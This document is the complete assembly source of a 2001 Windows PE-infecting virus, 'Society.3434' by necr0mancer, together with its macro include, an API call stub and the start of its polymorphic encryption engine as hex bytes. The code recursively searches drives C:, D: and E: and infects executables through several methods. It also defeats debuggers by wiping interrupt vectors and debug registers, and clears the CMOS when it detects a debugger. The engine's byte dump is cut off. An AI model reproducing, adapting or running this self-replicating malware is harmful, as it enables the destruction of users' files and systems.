ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SOCIETY.TXT]ÄÄÄ ;============================================================================== ; Win9x/Win2k.Society.3434 (c) necr0mancer ; december 2001 ;ring-3 PE infector ; ;Features: ; ; * Works only in win2k & win9x,but can work on winNT(I haven't it!) if ; you add it kernel base on table (see source). ; * Polymorphic (use NPE32 engine). ; * Some infection methods (EPO,standart, .reloc OR .debug overwrite). ; * Simple antidebug. ; * Payload (on trace with td32:)) CMOS kill.) ; * Not infecting winzip self-extactors & upx-packed files ; ;Tnx: to all who write stuff. ; Infection sheme: ; ;============================================================================== ; ÚÄÄÄÄÄÄÄÄÄÄÄ¿ ; ³ main ³ ÍÍÍÍÍ - incorect secton size ; ÀÄÄÄÄÄÂÄÄÄÄÄÙ ; ÚÄÄÄÄÄÁÄÄÄÄÄ¿ ; ³ find reloc³ ; ÀÄÄÄÄÄÂÄÄÄÄÄÙ ; ÚÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄ¿ ; ÚÄÄÁÄÄÄ¿ ÚÄÄÄÁÄÄ¿ ; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´findedÆÍÍÍÍÍÍ» ³failed³ ; ³ ÀÄÄÂÄÄÄÙ º ÀÄÄÄÂÄÄÙ ; ³ ÚÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄ¿ º ÚÄÄÄÄÁÄÄÄÄÄÄÄÄ¿ ; ³ ³ EPO infection ³ ÚÄ×ÄÄÄ´ find .debug ³ ; ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ º ÀÄÄÄÄÂÄÄÄÄÄÄÄÄÙ ; ³ ³ º ³ ; ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ º ÚÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ; ÀÄ´Overwrite infection ÃÄÄÄÄÙ ÈÍÍ͵"standart" infection ³ ; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ; ; ;============================================================================== include 1.inc include win.inc PAGE_READWRITE equ 4 FILE_MAP_WRITE equ 2 DEBUG equ 0 ;no debug-release;) extrn MessageBoxA:near extrn ExitProcess:near VIRTUAL_SIZE equ (offset _endvbody-offset _start) PHYSICAL_SIZE equ (offset _fbodyend-offset _start) DEBUG equ 0 .586p .model flat .data message_title db '[Dekadance] has been start.',0 _message db 'Credo:',0dh db 'Dekadance is lifestyle.',0dh,0dh db 'Copyleft (c) 2001 necr0mancer',0 .code _emulation: push eax ;jmp viri xor eax,eax jmp _callz_manager Original: push MB_ICONEXCLAMATION push offset message_title push offset _message push 0 call MessageBoxA push 0 call ExitProcess ; call ExitProcess ;------------------------------------------------------------------------------ ;Run loader _callz_manager: pushfd ;save flags®s pusha @cm equ <-offset @@GetDelta> call @@GetDelta ;get delta @@GetDelta: pop ebp if DEBUG eq 1 int 3 endif and eax,0ffh ;AL=# in function table push eax push ebp xor edi,edi nop_call: call _start pop ebp push edi lea edi,[ebp+nop_call @cm] mov eax,90909090h ;write nop for next call stosd stosb pop edi pop eax ;eax=# in function table shl eax,3 ;eax*8 or edi,edi ;first mng_call? jnz table_offset_exist db (0b8h OR __edi) ;mov edi,xxxxxxxx delta_tbl dd 0 jmp short get_me_out table_offset_exist: mov [ebp+delta_tbl @cm],edi ;save table_pointer ;for next calls get_me_out: lea edi,[edi+eax] mov eax,[esp+8*4+4] ;restore old eax mov [esp._eax],eax mov [esp+8*4+4],edi ;write ret adr popa popfd ret ;============================================================================== ;Virii part @ex equ <-offset Delta> _start: call Delta ;get Delta Delta: if DEBUG eq 1 int 3 endif pop ebp jmp short AfterData ;go to main part ; === some data === imagebase dd 00400000h OldRVA dd (offset Original-00400000h) fmask db '*.exe',0 tbl: dd 77e80000h dd 0Bff70000h dd 0 jmp_table: mov eax,offset Original jmp eax dq 9 dup (0) Mask_table: db 2 dw 025FFh ;jmp xxxxxxx db 0 db 0 db 0 ;============================================================================= Fsize dd ? Voff dd ? Foff dd ? MZbase dd ? AfterData: db 0b8h ;mov eax,xxxxxxxx reTT_need dd 1 ;flag of type infection or eax,eax jnz no_need_heh mov eax,[ebp+OldRVA @ex] ;restore old entrypoint add eax,[ebp+imagebase @ex] push eax ;FOR returning in prog no_need_heh: lea esi,[ebp+jmp_table @ex] ;copy adr_table lea edi,[ebp+jmp_tmp_table @ex] mov ecx,10*2 rep movsd lea eax,[ebp+offset @@@error_handle @ex];find kernel base push eax xor eax,eax push 4 ptr fs:[eax] ;set SEH mov fs:[eax],esp lea esi,[ebp+offset tbl @ex] ;possible kernel bases lea edi,[ebp+offset __kernel32 @ex] pusha jmp _lodsd _ex: pop 4 ptr fs:[eax] ;restore SEH pop eax ; jmp no_yet ;& exit ;============================================================================= @@@error_handle: mov esp,[esp+8] sub esp,20h _lodsd: popa lodsd or eax,eax ;end of table ? je _ex mov [edi],eax pusha db 0b8h __kernel32 dd 0 cmp word ptr[eax],'ZM' ;test on MZ jne _lodsd __ok: xchg eax,ebx xor eax,eax add esp,20h pop 4 ptr fs:[eax] ;restore SEH pop eax ;============================================================================== sys_ok: lea esi,[ebp+offset _Table @ex] ;table of CRC32 lea edi,[ebp+offset _adr @ex] ;table of needed ;function's adresses Ft_repeat: call get_proc_adr ;find adress or eax,eax ;no finded :( jz end_Ft_cycle stosd jmp Ft_repeat end_Ft_cycle: out 70h,al ; in al,71h ; inc al ; shl eax,8 ; mov ecx,1000000 ; GET RANDOM NUMBER loop $ ; out 70h,al ; in al,71h ; not eax ; save it mov [ebp+__seed @ex],eax ; for virii inc eax ; mov [ebp+runSeed @ex],eax ; and for NPE xor eax,eax ;files infected=0 mov 4 ptr[ebp+FileNum @ex],eax mov [ebp+our_ebp @ex],ebp ;save current delta ;for creating thread xor ebx,ebx ;ebx=0 lea eax,[ebp+offset Thr_indefirer @ex] push eax push ebx ;push 0 push ebx ;push 0 lea eax,[ebp+offset Thread_proc @ex] ;offset to thread proc push eax push ebx ;push 0 push ebx ;push 0 call [ebp+CreateThread @ex] ;Create thread no_yet: lea edi,[ebp+offset jmp_tmp_table @ex] ;get jmp_table pointer ;to calls_manager retn ;exit to parent code Thread_proc: db (0b8h or __ebp) ;mov ebp,xxxxxxxx our_ebp dd 0 lea edi,[ebp+SearchRec @ex] lea edx,[ebp+dirname @ex] mov [edx],'\:C' call filefind ;infect drives mov [edx],'\:D' call filefind mov [edx],'\:E' call filefind db 0b8h ;mov eax,xxxxxxxx Thr_indefirer dd 0 push eax call [ebp+ExitThread @ex] ;good bye! ;========================================================================================= ;Input: esi=offset of string ; ebx=kernel adr ;Out : eax=adr(if has finded;)) get_proc_adr proc push edi push eax lodsd mov [ebp+crc32 @ex],eax ;save getted crc pop eax mov ecx,[ebx+3ch] ;PE-header offset add ecx,ebx mov ecx,[ecx+78h] ;Export table offset jecxz return_0 ;if (et=null) then err add ecx,ebx ;ecx-offset of export ;table xor edi,edi _search: mov edx,[ecx+20h] ;offsets on FuncNames add edx,ebx ;correct on base mov edx,[edx+edi*4] add edx,ebx push esi ;crc table push ecx ;base mov esi,edx push edx find_zero: lodsb or al,al jnz find_zero dec esi sub esi,edx xchg ecx,esi pop esi call CRC32 db (0b8h or __edx) ;mov edx,crc crc32 dd 0 pop ecx ;base pop esi ;table cmp edx,eax je _name_found inc edi cmp edi,[ecx+18h] jb _search return_0: xor eax,eax ;error ocures jmp _return _name_found: ;esi=index on string table mov edx,[ecx+24h] add edx,ebx movzx edx,word ptr [edx+edi*2] mov eax,[ecx+1ch] ;AdrTable add eax,ebx ;correct on base mov eax,[eax+edx*4] add eax,ebx ;get adress of nedded function _return: pop edi ;in output eax retn get_proc_adr endp ;============================================================================= ; INFECT ;============================================================================= infect proc pushad mov esi,edx ;esi=edx=full name _findzero: lodsb or al,al jnz _findzero ;esi=offset of null byte+1 mov eax,[esi-4] cmp eax,00455845h ;EXE? je exe_infect cmp eax,00657865h ;exe? jne no_EXE exe_infect: cmp byte ptr [ebp+FileNum @ex],15 ja no_EXE ;More than 15 files? _gogo: call fopen ;edx=FileName or eax,eax ;error ocures? je i_close_exit xchg ebx,eax ;ebx=handle call f_createmap ;createfilemapping mov [ebp+MZbase @ex],eax xchg eax,edx ;edx=mem_adr mov ax,word ptr[edx+18h] cmp al,40h jne i_close_exit mov eax,[edx+3ch] add edx,eax ;EDX=offset of PE header mov eax,[edx] cmp ax,'EP' ;really PE ? jne i_close_exit ;get last section movzx eax,word ptr[edx+14h] ;NT header size add eax,18h ;Size of PE-header add eax,edx ;Eax=offset of Object table push eax push edx movzx eax,word ptr[edx+6h] ;Number of objects dec eax smov esi,40 ;size of table mul esi ;result in EDX:EAX xchg esi,eax ;ESI=offset of last object pop edx pop eax mov edi,eax ;edi=Object-table add esi,eax ;correct(esi=last object) push edi ;============================================================================= ;find winzip or UPX0 mov al,1 movzx ecx,word ptr[edx+6h] ;Number of objects find_upx: cmp 4 ptr[edi],'niw_' ;_winzip_ je zip_upx cmp 4 ptr[edi],'0XPU' ;UPX0 je zip_upx add edi,40 loop find_upx xor eax,eax zip_upx: ;============================================================================= pop edi or eax,eax jnz i_close_exit mov eax,[edx+34h] ;get & save imagebase mov [ebp+imagebase @ex],eax mov ecx,[esi+10h] ;get Fsize mov [ebp+Fsize @ex],ecx mov eax,[esi+8h] ;get Vsize or eax,eax ;Vsize=0? jz i_close_exit or ecx,ecx ;Fsize=0? jz i_close_exit cmp eax,ecx ;Vsize<Fsize jb i_close_exit mov eax,[esi+14h] ;get Foffset mov [ebp+Foff @ex],eax mov eax,[esi+0Ch] ;get Voffset mov [ebp+Voff @ex],eax mov ecx,'emit' ;check & write sign cmp [edx+08h],ecx je i_close_exit mov [edx+08h],ecx push esi ;esi=last (copy) push eax ;SAve VO of virii push edi ;obj-table offst ;find .reloc section movzx ecx,word ptr[edx+6h] ;Number of objects find_reloc: cmp 4 ptr[edi],'ler.' ;.reloc je question_EPO add edi,40 loop find_reloc ;============================================================================== ;find .debug section pop edi ;begin of sections tabl. movzx ecx,word ptr[edx+6h] ;Number of objects find_debug: cmp 4 ptr[edi],'bed.' ;.debug je @@reloc_debug_finded add edi,40 loop find_debug ;============================================================================== ;neither .reloc nor .debug not finded jmp @@Standart @@reloc_finded_stack: pop eax ;clear stack @@reloc_debug_finded: ;.reloc or .debug are finded mov eax,[ebp+MZbase @ex] ;begin of Exe add eax,[edi+14h] ;esi=Physical_Offset of .debug section mov 4 ptr[ebp+reloc_offset @ex],eax @@Overwrite: add esp,4*2 xor ecx,ecx mov [ebp+reTT_need @ex],ecx ;set flag @@overwrite=0 xchg edi,esi ;esi=.reloc secton lea eax,[edx+28h] ;set new RVA mov ecx,[eax] or ecx,ecx jz i_close_exit ;RVA=0 mov [ebp+OldRVA @ex],ecx mov ecx,[esi+0ch] ;section RVA mov [eax],ecx mov eax,10000 ;get 10 kb call GetMem push eax xchg edi,eax call call_NPE32 ;edi=bufer dectination mov [esi+24h],0E0000020h ;set attributes add [esi+10h],ecx ;Add virus size xchg edi,esi ;esi=data db (0B8h or __edi) ;mov edi,xxxxxxxx reloc_offset dd 0 rep movsb ;write virii jmp common_exit @@Standart: pop esi ;<<<clear stack pop esi xor ecx,ecx mov [ebp+reTT_need @ex],ecx ;set flag @@overwrite=0 lea edi,[edx+28h] ;set new RVA mov ecx,[edi] or ecx,ecx ;RVA==0 ? jz i_close_exit mov [ebp+OldRVA @ex],ecx mov eax,[ebp+Voff @ex] add eax,[ebp+Fsize @ex] ;eax=virtual offset+physic size=new RVA mov [edi],eax mov eax,10000 ;10 kb call GetMem push eax xchg edi,eax mov ecx,[edx+38h] ;Virtual aligment mov eax,VIRTUAL_SIZE+400h*2 ;add 2 kb for decryptor call Round ;align to phys_aligment add [esi+08h],eax ;Add virus size to section mov eax,[esi+08h] mov ecx,[ebp+Voff @ex] ;Virtual offset+virtualsize add ecx,eax mov [edx+50h],ecx ;Correct imageSize mov [esi+24h],0E0000020h ;set attributes call call_NPE32 add [esi+10h],ecx ;Add virus size push ecx mov ecx,[ebp+Foff @ex] add ecx,[ebp+Fsize @ex] ;Offset of end of last section call fseek pop ecx ;restore cpypted_size call fwrite ;write virii jmp common_exit ;============================================================================== question_EPO: cmp 4 ptr[edi+10h],PHYSICAL_SIZE+900h ;check section size jnb size_s_ok pop eax ;<<<clear stack jmp @@Standart ;standart infect size_s_ok: ;if reloc < virsize smov eax,3 ;max 2 call randomGen ;get random number or eax,eax ;0 = make overwrite jnz _dbg ;1 = make EPO ;2 = debugers sucks:) ; & EPO _clear_one_param: ; pop eax ;<<<clear stack ; jmp @@reloc_debug_finded jmp @@reloc_finded_stack _dbg: dec eax ;eax==1? jz @@reloc_EPO call Debuger_fuckup @@reloc_EPO: pop eax ;first obj. inc 4 ptr[ebp+reTT_need @ex] ;set flag @@overwrite ;into 1 or whatever value mov esi,[ebp+MZbase @ex] ;begin of Exe add esi,[eax+14h] ;esi==Physical_Offset of first section pop eax ;clear stack<<<< mov eax,[ebp+Voff @ex] add eax,[ebp+Fsize @ex] ;eax=virtual offset ;+physic size=new RVA mov ecx,[edi+0ch] ;get section RVA pop eax ;clear stack<<<< push edi ;.reloc offset mov edi,[edi+14h] ;edi=offset of .reloc section add edi,4 ptr[ebp+MZbase @ex] ;correct on begin of file mov eax,400h ;write_some_garbage call randomGen inc eax add ecx,eax ;correct RVA_reloc add eax,edi mov [ebp+EPO_edi @ex],eax lea eax,[ebp+Mask_table @ex] push eax lea eax,[ebp+replace @ex] push eax smov eax,10 ;get random (max 10) call randomGen inc eax push eax ;count of functions push edi ;RELOC offset push esi ;CODE offset push ecx ;virtual offset ;----------------------------------------------------------------------------- ;Create_UEP( ; dword VO // virtual offset ; *dword code // offset to .code section(already has read) ; *dword reloc // offset to .reloc section(already has read) ; dword num_records // count of records in table to rewrite ; *dword adr_modify // address of "replasing" proc ; *dword mask_table // pointer to a mask table ; ); ;----------------------------------------------------------------------------- call Create_UEP pop esi ;restore original esi jc i_close_exit ;no_relocs_finded :( mov eax,10000 ;get 10 kb call GetMem push eax xchg edi,eax ;edi=mem call call_NPE32 ;cpypt virii add [esi+10h],ecx ;Add virus size mov [esi+24h],0E0000020h ;set attributes push ecx push edi db (0b8h or __edi) ;mov edi,EPO_edi EPO_edi dd 0 lea esi,[ebp+c_manager @ex] mov ecx,cm_size ;manager size rep movsb ;copy "manager" pop esi pop ecx rep movsb ;copy virii common_exit: call [ebp+GlobalFree @ex] ;free memory inc byte ptr [ebp+FileNum @ex] i_close_exit: call f_closemap ;unmap file from memory call fclose ;close file no_EXE: popad retn infect endp ;============================================================================== ;In: edx=dirname ; edi=SearchRec filefind proc pushad sub esp,1024 ;for full directory name mov esi,edx ;esi=offset of dirname mov edi,esp ;edi=memory for FULL dirname _scopy: lodsb stosb or al,al ;end of ASCIIZ string? jnz _scopy dec edi mov al,'\' ;add '\' if need cmp [edi-1],al je _estislesh stosb _estislesh: mov esi,edi ;esi=position for file/dir mov eax,'*.*' stosd mov eax,esp mov edi,[esp+1024] ;restore edi push edi push eax call [ebp+FindFirstFile @ex] ;eax=handle for search inc eax jz ff_quit ;cmp eax,-1 dec eax xchg ebx,eax ;search handle ff_infect: push ecx ;pause mov ecx,1000000 loop $ pop ecx pushad xchg esi,edi ;edi=position of file/dir,esi=ff_struc lea esi,[esi].ff_fullname ;esi=finded name _sadd: lodsb ;string add stosb or al,al jnz _sadd popad mov edx,esp ;FULL name of file/dir test byte ptr [edi].ff_attr, 16 jnz ff_dir ;dir? call infect ;no dir,infect jmp ff_next ff_dir: cmp byte ptr [edi].ff_fullname,'.' je ff_next call filefind ff_next: push edi push ebx call [ebp+FindNextFile @ex] or eax,eax jnz ff_infect ;no dirs/files? ff_quit: push ebx call [ebp+FindClose @ex] add esp,1024 popad retn filefind endp ;============================================================================== ;In : edi=bufer ;Out : ecx=size generated ;modify :eax,edx,ecx call_NPE32 proc call Debuger_fuckup push ebx push edx xor eax,eax inc eax cpuid ;get unical value xor eax,edx ;for this CPU pop edx pop ebx push eax ;move it in flags mov eax,[ebp+offset runSeed @ex] push eax ;seed (or NULL) xor eax,eax mov [ebp+offset runSeed @ex],eax ;seed has been ;inicialized == NULL _push_size: mov eax,PHYSICAL_SIZE push eax ;size push edi ;bufer lea eax,[ebp+offset _start @ex] ;data push eax ;============================================================================== ;int NPE_main( ; offset data ; offset bufer ; count_bytes ; seed (nul if not 1st generation) ; flags ; ) ;============================================================================== call npe_main ;out eax=size xchg ecx,eax jnc e_call_npe32 ;if no errors ;---------------- error ------------------ mov ecx,PHYSICAL_SIZE pusha lea esi,[ebp+offset _start @ex] ;data ;edi = bufer rep movsb ;copy virii to bufer popa e_call_npe32: retn call_NPE32 endp ;============================================================================== GetMem proc pusha push eax push GMEM_FIXED call [ebp+GlobalAlloc @ex] ;GetMemory ;eax=offset of getted memory mov [esp._eax],eax popa retn GetMem endp ;============================================================================== ;Input:ecx=field of rounding ; eax=size Round proc bsr ecx,eax ;Scan backward for bit dec ecx shr eax,cl inc eax shl eax,cl retn Round endp ;============================================================================== CRC32 proc pusha db (0b8h or __ebx) ;mov ebx,polinom polinom dd 04c11db7h xor edx,edx next_8_bites: push ecx xor eax,eax lodsb shl eax,32-8-1 smov ecx,8 carry_find: shl eax,1 shld edx,eax,1 jnc not_carry xor edx,ebx not_carry: loop carry_find pop ecx loop next_8_bites ;add null bites smov ecx,32+8+1 @carry_find: shl edx,1 jnc @not_carry xor edx,ebx @not_carry: loop @carry_find mov [esp._eax],edx ;return CRc in eax popa ret CRC32 endp ;============================================================================== replace: ;=== copy old jumper to table=== ;ecx=#of finded ;edi=offst of command(cor) ;ebx=offset of commnd(phys) ;esi=setted virtual offset pusha push esi push edi xchg edi,esi lea edi,[(ebp+offset jmp_table)+ecx*8 @ex] ;num in table movsd movsd pop edi mov ax,0b050h ;push eax+mov al stosw ;ecx=count/index xchg eax,ecx ;eax=num records param mov ah,0e9h ;jmp..... stosw pop eax ;VO sub eax,ebx sub eax,5+3 ;Pa3Huya stosd popa retn ;============================================================================== ;============================================================================= randomGen proc pusha push eax ;save max_random db 0b8h ;mov eax,xxxxxxxx __seed dd 12345678h mov edi,134775813 ;eax=new seed mul edi ;EDX:EAX=EAX*EDI inc eax mov [ebp+__seed @ex],eax xor edx,edx pop ecx or ecx,ecx ;max_random=0 jz __div_0 div ecx mov [esp._eax],edx __div_0: popa ret randomGen endp ;============================================================================= Debuger_fuckup proc pusha call [ebp+IsDebuggerPresent @ex] ;catch stupid TD32 ;) or eax,eax jnz fuckup push edi sidt [esp-2] pop edi mov [edi+1*8],eax ;kill int 1 mov [edi+3*8],eax ;kill int 3 mov dr0,eax ;kill debug system regs mov dr1,eax ;NOTE: mov dr2,eax ; SoftIce is interrupts mov dr3,eax ; this commands & ; virii suck. popa retn fuckup: smov eax,5eh ;Clear CMOS smov edx,70h call PM_out xor eax,eax smov edx,71h call PM_out jmp $ ;============================================================================= PM_out proc push eax push edx mov edx, esp smov eax,0F7h ;WRITE_PORT_UCHAR int 2Eh add esp, 2*4 retn PM_out endp ;============================================================================= Debuger_fuckup endp c_manager: include call_mng.inc cm_size equ $-offset c_manager include RIPbin.inc include ring3io.inc include npe32bin.inc _Table: _CreateFileA dd 0830F55B4h _CreateFileMapping dd 06817C213h _MapViewOfFile dd 0CF4C00A1h _UnmapViewOfFile dd 0C027BC23h _CloseHandle dd 07CD0735Bh _ReadFile dd 02804FB4Dh _FindFirstFileA dd 0A32BE888h _FindNextFileA dd 0233AEB5Eh _FindClose dd 0E6CCF387h _GlobalAlloc dd 06CCA7EE0h _GlobalFree dd 04753EBE5h _SetFilePointer dd 0E747C386h _WriteFile dd 018D5ABDFh _GetCurrentDirectoryA dd 0B089B6BEh _IsDebuggerPresent dd 015B27F29h _ExitThread dd 01E799321h _CreateThread dd 072F17A7Bh its_over dd 0FFFFFFFFh _fbodyend: _adr: CreateFile dd ? ;2 CreateFileMappingA dd ? MapViewOfFile dd ? UnmapViewOfFile dd ? CloseHandle dd ? ;3 ReadFile dd ? ;4 FindFirstFile dd ? ;6 FindNextFile dd ? ;7 FindClose dd ? ;8 GlobalAlloc dd ? ;9 GlobalFree dd ? ;a SetFilePointer dd ? ;b WriteFile dd ? ;c GetCurrentDirectory dd ? ;d IsDebuggerPresent dd ? ExitThread dd ? CreateThread dd ? ;------------------------------------- curdir db 260 dup (?) SearchRec f_struc<,,,,,,,> DirNum db ? FileNum db ? bytesread dd ? first_run_npe dd ? runSeed dd ? dirname dd ? jmp_tmp_table: dq 10 dup (?) _endvbody: end _emulation ;============================================================================== ; (C) necr0mancer 2001 ; necr0mancer2001@hotmail.com ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SOCIETY.TXT]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[1.INC]ÄÄÄ MAX_GARBAGE equ 6 MAX_OPERATIONS equ 5 ;cryptor size ; 100+(6*5*6*5)~1kb maximum ; ; __eax equ 000b __ebx equ 011b __edx equ 010b __ecx equ 001b __esi equ 110b __edi equ 111b __ebp equ 101b smov macro p1,p2 if p2 gt 07fh if p2 lt 100h if p1 eq eax xor eax,eax mov al,&p2& endif if p1 eq ebx xor ebx,ebx mov bl,&p2& endif if p1 eq ecx xor ecx,ecx mov cl,&p2& endif if p1 eq edx xor edx,edx mov dl,&p2& endif else mov &p1&,&p2& endif else push &p2& pop &p1& endif endm opcod struc code dw 0 flags db 0 code_num db 0 opcod ends ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[1.INC]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CALL_MNG.INC]ÄÄÄ ;============================================================================= ;Api_call stub (c) necr0mancer ;necr0mancer2001@hotmail.com ;============================================================================= db 09Ch,060h,0E8h,000h,000h,000h,000h,05Dh,0CCh,025h,0FFh,000h,000h,000h,050h db 055h,033h,0FFh,0E8h,031h,000h,000h,000h,05Dh,057h,08Dh,07Dh,00Bh,0B8h,090h db 090h,090h,090h,0ABh,0AAh,05Fh,058h,0C1h,0E0h,003h,00Bh,0FFh,075h,007h,0BFh db 000h,000h,000h,000h,0EBh,003h,089h,07Dh,026h,08Dh,03Ch,007h,08Bh,044h,024h db 024h,089h,044h,024h,01Ch,089h,07Ch,024h,024h,061h,09Dh,0C3h ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CALL_MNG.INC]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[NPE32BIN.INC]ÄÄÄ ;============================================================================== ; Necromancer's Polymorphic Engine ; v 1.0 ; (c) necr0mancer december 2001 ; ; ;stdcall ;int NPE_main( ; DWORD *offset data //offset to data ; DWORD *offset bufer //offset of bufer(see ramarks) ; DWORD count_bytes //size of crypting data ; DWORD seed //(see remarks) ; DWORD flags //(see remarks) ; ); ; ;Output: EAX = Size of crypted data and decryptor. ; cf = 1 if error ; cf = 0 if success ; ;Remarks: ; Engine must run in r/w section. ; ; *bufer : Size of bufer must be larger of really size data beakose NPE use ; bufer for building cryptor/decryptor. ; In real size of bufer must be about 400h*3+size of data+1 ; But I test it with many-memory allocate & can't said ; about working npe32 with little bufer. ; ; Flags: ; ; bits: ; ÚÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ; ³ 0..6 ³ Using regs32 ³ ; ÃÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ; ³ 7 ³ Antidebug functions enabled ³ ; ÃÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ; ³ 8..11 ³ number of commands in using commands ³ ; ÃÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ; ³ 11..16 ³ number of commands in using garbage ³ ; ÀÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ; ; Regs32 (bits 0..6): ; ÚÄÄÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄ¿ ; ³ bit ³ 0 ³ 1 ³ 2 ³ 3 ³ 4 ³ 5 ³ 6 ³ ; ÃÄÄÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´ ; ³ reg ³EAX³EBX³EDX³ECX³ESI³EDI³EBP³ ; ÀÄÄÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÙ ; ; Seed: ; if this parametr is not NULL then randseed generator of NPE32 ; gets a new value for inicialize.If it is NULL NPE32 use getted ; value for any random operations. ; ;And one 'little' thing : npe32 has a bug working in multi-layer mode, ;which destroyes original data.If size of encryptors+data more than ;D00h bytes it happends. ; ;necr0mancer2001@hotmail.com npe_main: db 060h,0E8h,000h,000h,000h,000h,05Dh,0EBh,077h,081h,0C0h,0A1h,001h,081h,0E8h db 0A1h,000h,081h,0F0h,0A1h,002h,0F7h,0D0h,085h,003h,0D1h,0C0h,085h,005h,0D1h db 0C8h,085h,004h,040h,000h,045h,007h,048h,000h,045h,006h,0F7h,0D8h,085h,008h db 087h,0C0h,082h,000h,08Bh,0C0h,082h,000h,083h,0C0h,0C9h,000h,083h,0E8h,0C9h db 000h,090h,090h,040h,000h,0EBh,000h,080h,000h,083h,0C8h,0CDh,000h,083h,0F0h db 0CDh,000h,00Bh,0C0h,082h,000h,023h,0C0h,082h,000h,000h,003h,002h,001h,006h db 007h,005h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h db 000h,000h,000h,000h,000h,061h,0F9h,0C3h,08Bh,04Ch,024h,030h,0E3h,006h,089h db 08Dh,0D0h,004h,000h,000h,08Bh,054h,024h,034h,052h,083h,0E2h,07Fh,08Dh,07Dh db 070h,08Dh,075h,04Fh,033h,0C0h,040h,06Ah,007h,059h,033h,0DBh,052h,023h,0D0h db 074h,002h,043h,0A4h,0D1h,0E0h,05Ah,0E2h,0F4h,00Bh,0DBh,074h,0CBh,083h,0FBh db 003h,072h,0C6h,089h,09Dh,0BBh,003h,000h,000h,058h,08Bh,0D0h,066h,081h,0E2h db 0FFh,000h,066h,025h,000h,0FFh,0C1h,0E8h,008h,08Bh,0C8h,025h,0F0h,000h,000h db 000h,0C1h,0E8h,004h,083h,0F8h,009h,076h,003h,06Ah,009h,058h,00Bh,0C0h,074h db 09Bh,089h,085h,0C2h,001h,000h,000h,083h,0E1h,00Fh,083h,0F9h,00Ah,076h,003h db 06Ah,00Ah,059h,00Bh,0C9h,074h,086h,089h,08Dh,0D1h,003h,000h,000h,08Bh,04Ch db 024h,02Ch,089h,08Dh,0F5h,002h,000h,000h,08Bh,07Ch,024h,028h,08Bh,074h,024h db 024h,057h,053h,051h,081h,0C7h,000h,00Ch,000h,000h,057h,0B8h,090h,000h,000h db 000h,003h,0C8h,0F3h,0AAh,05Fh,059h,08Bh,0DFh,00Fh,0BAh,0E2h,007h,073h,017h db 051h,056h,08Dh,0B5h,007h,005h,000h,000h,0B9h,019h,000h,000h,000h,001h,08Dh db 0F5h,002h,000h,000h,0F3h,0A4h,05Eh,059h,0F3h,0A4h,08Dh,08Dh,0CDh,004h,000h db 000h,058h,08Bh,0F0h,0FFh,0D1h,08Ah,054h,005h,070h,08Bh,0C6h,0FFh,0D1h,08Ah db 074h,005h,070h,03Ah,0F2h,074h,0F4h,088h,075h,057h,056h,04Eh,04Eh,08Bh,0C6h db 